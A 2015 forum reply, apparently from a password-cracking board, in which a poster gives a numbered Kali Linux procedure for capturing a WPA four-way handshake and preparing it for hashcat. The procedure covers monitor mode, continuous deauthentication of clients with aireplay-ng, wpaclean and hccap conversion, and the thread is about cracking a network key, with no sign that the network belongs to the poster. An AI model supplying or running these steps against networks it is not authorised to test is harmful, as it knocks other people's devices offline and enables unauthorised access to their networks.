02-22-2015, 09:16 PM
(02-22-2015, 10:06 AM)h4x0rm1k3 Wrote: Yes I got that, thanks. I somehow managed to get a full 4 way handshake from the AP, never managed to before so i've followed your directions and stripped the beacon & 4 way handshake frames and converted it to a hccap file to continue cracking from where the other 1 left off. With any luck I should stumble upon the key soon enough and if not i'll go over the keyspace that i've already got through and find it there. Thanks for all your input, I wouldn't have got this far without it!
....and "wifite" was another program that didn't always work for me in The-Distribution-Which-Does-Not-Handle-OpenCL-Well (Kali). So, since you are having a problem with getting a full 4 way handshake, you can follow the process I use below in The-Distribution-Which-Does-Not-Handle-OpenCL-Well (Kali). It will also clean up the .cap file for you which you were also having an issue with. It works for me every time.
1. airmon-ng start wlan0 (puts your wireless NIC into monitor mode)
2. airodump-ng mon1 (or whatever mon0 it starts for you. make note of your targets channel)
3. airodump-ng mon1 -w /root/Desktop/handshake -c 1 (in a separate console. c = channel to listen on and stores .cap file on desktop)
4. aireplay-ng --deauth 0 -a AccessPointMAC --ignore-negative-one mon1 (forces reconnection of clients to capture handshake - it will flash quick in the airodump console!)
5. wpaclean /root/Desktop/clean.cap /root/Desktop/handshake.cap (yes it's backwards on purpose, cleans .cap to get it ready to convert to .hccap)
6. aircrack-ng /root/Desktop/clean.cap -J /root/Desktop/ready.hccap (converts cleaned.cap file to ready.hccap file for hashcat to crack. Can rename it to SSID if you want to keep organized)
7. If you don't clean the .cap first, you can see all the network names and if a handshake was captured or not. You can then pick one you want.